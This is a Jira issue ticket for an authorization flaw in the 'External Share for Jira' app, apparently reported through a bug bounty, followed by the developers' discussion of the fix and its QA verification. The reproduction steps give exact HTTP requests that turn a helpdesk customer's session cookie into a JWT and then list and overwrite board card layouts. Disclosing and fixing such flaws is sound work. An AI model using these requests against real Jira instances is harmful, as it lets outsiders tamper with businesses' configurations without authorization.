ESFJ-1098
Unauthorized Modification of Board Card Settings
Description
Summary
It has been discovered that a "customer" user, self-registered on a Jira helpdesk portal, can modify the settings and layout of board cards in Jira.
Details
Initially, a service project was created in Jira. I then registered a "customer" account on that project's portal, as shown below:
The following image demonstrates the request made to obtain the context URL for the application, using the "customer" user's cookies:
Subsequently, I submitted a request using the obtained URL in the url parameter to obtain a valid JWT for interacting with the application:
Next, it was possible to modify the Jira board card layout using the obtained JWT:
-
Request sent to list board cards in Jira
-
Request sent to modify the board card settings
Impact
This vulnerability compromises the integrity of the board card configurations used in external shares. An external attacker, merely registered as a "customer" on the helpdesk portal, can alter these configurations and disrupt the external shares of businesses without even having direct access to the victim's Jira.
Steps to Reproduce
-
Log in as an administrator in Jira and install the “External Share for Jira” app.
-
Navigate to apps > external share > board card settings.
-
Create a new configuration and save it.
-
Then, create a Service project in Jira.
-
Access the created service project and copy the project portal URL from the "channels" menu.
As Attacker:
-
Access the portal URL in another browser and register as a customer.
-
In your browser’s developer tools, copy the cookie
customer.account.session.token. -
Replace
{your-domain}in the following request with your Jira hostname and{customer-cookie}with the copied value (customer cookie):
POST /plugins/servlet/ac/ovh.atlasinc.jira.jira-share/create-board?classifier=json HTTP/2Host: {your-domain}.atlassian.netCookie: customer.account.session.token={customer-cookie}Content-Length: 0
-
Copy the URL from the url parameter.
-
Submit the following request after replacing
{url}with the copied URL to get a JWT for the user:
POST /api/atlassian-connect-app HTTP/1.1Host: jira.external-share.comContent-Type: application/jsonContent-Length: 738Origin: https://jira.external-share.com{"url":"{url}"}
-
Copy the JWT returned by the application.
-
Submit the following requests after replacing
{customer-jwt}with the obtained JWT:
* List created board card layoutsGET /api/board-card-layout/list HTTP/1.1Host: jira.external-share.comAuthorization: JWT {customer-jwt}
* Modify a board card layout> Copy the ID of a layout from the response of the previous request.> Replace `{layout-id}` with the copied ID.
PUT /api/board-card-layout HTTP/1.1Host: jira.external-share.comContent-Type: application/jsonContent-Length: 1286Authorization: JWT {customer-jwt}{"name":"bugcrowd-poc","id":{layout-id},"cardLayout":[{"cells":[{"type":"cell","value":{"value1":{"id":"summary","text":"Summary","selected":true,"disabled":false},"value2":{"id":"","text":"","selected":true,"disabled":false},"value3":{"id":"","text":"","selected":true,"disabled":false}}}],"justifyContent":"SPACEBETWEEN","type":"row","index":0},{"cells":[{"type":"cell","value":{"value1":{"id":"labels","text":"Labels","selected":true,"disabled":false},"value2":{"id":"parent","text":"Parent","selected":true,"disabled":false},"value3":{"id":"","text":"","selected":true,"disabled":false}}}],"justifyContent":"SPACEBETWEEN","type":"row","index":1},{"cells":[{"type":"cell","value":{"value1":{"id":"issuetype","text":"Issue Type","selected":true,"disabled":false},"value2":{"id":"issueKey","text":"Issue Key","selected":true,"disabled":false},"value3":{"id":"","text":"","selected":true,"disabled":false}}},{"type":"cell","value":{"value1":{"id":"subtasks","text":"Sub-tasks","selected":true,"disabled":false},"value2":{"id":"priority","text":"Priority","selected":true,"disabled":false},"value3":{"id":"assignee","text":"Assignee","selected":true,"disabled":false}}}],"justifyContent":"SPACEBETWEEN","type":"row","index":2}],"cardColor":{"type":"None","value":{"darkMode":{},"lightMode":{}}}}
-
Observe that it was possible to perform these operations, despite being authenticated as a "customer" user without access to Jira.
Activity
Details
Priority
High
Fix verified - QA env
Customer is not able to add, edit or delete card board issue layout
@Polina Naumenko Please retest, the list should be accessible now, but adding, updating or deleting requires admin permission so I guess it’s okay. Same as Issue layout
@Krzysztof BogdanWell, I’m left with this, and no more ideas… I think current solution will be enough for now, I’m transferring this jwt problem to a new independent issue 🙂
@Igor Hercer I think all views need to be secured to prevent JWT negotiation for JSM customer.
@Krzysztof Bogdan Ok, I’ll do it this way, but I think that adding, updating should be only for admin since he’s the only one that can actually access global settings, and the list should be secured with your solution. Maybe we should also secure the list for issue layouts because it has 0 security either.
@Igor Hercer We want regular users to view this list.
I think we should secure all views with:
I think that should solve the problem and Jira customer user will not be capable of generating JWT - but we need to test this.
Hello @Igor Hercer,
Please merge code to dev branch.
This is the best moment to add more information that can be helpful to prepare release notes.
Can you prepare short overview of change that can be used in release notes?
Please provide short GIF that showcase feature.
If GIF make no sense, can you provide image that highlights feature that can be used in release notes (cropped & annotated)?
Fix verified - QA env
@Polina Naumenko Please retest:)
@Krzysztof Bogdan Just wanted to ask, since only admins has access to global settings I’m gonna restrict this also.
@Igor Hercer Should you? Who should have access to this list?
@Krzysztof Bogdan is it okay or i should restrict the list also?
Customer is unable to modify layout
however, a customer is still able to get the list of board card setting
@Krzysztof Bogdan@Polina Naumenko Is it ready for deploy to dev?
@Polina Naumenko Yea this works
https://tracker.bugcrowd.com/warsawdynamics/submissions/edb4bc43-8372-4cc1-8bc1-2b09e1a0a27a?duplicate[]=false&sort[]=submitted-desc&substate[]=resolved
@Krzysztof Bogdan how about this one?
Hello @Igor Hercer
This is the best moment to add more information that can be helpful for tester.
What areas are affected?
What are potential edge cases?
Was it checked for XSS problems?
Does change affect security, is new data exposed?
Please attach - Before / After screenshot if possible.
@Polina Naumenko I have no access to:
https://tracker.bugcrowd.com/tasks/bb0f0424-a67e-478b-9f47-a06273335a1d
Can you link submission?
Hello @Igor Hercer,
Change was reviewed and approved.
Task is ready to be deployed to QA.
Once it is deployed to QA please move ticket to "To Test"
Thank you!
Hello [~accountid:],
Task is ready for review.
@Igor Hercer please make sure reviewer
have easy access to contend to be reviewed.
If this is code change. Please make sure PR is created.
If this is new documentation, blogpost, etc. Please provide link to page.
@Krzysztof Bogdan sure
@Igor Hercer Please take a look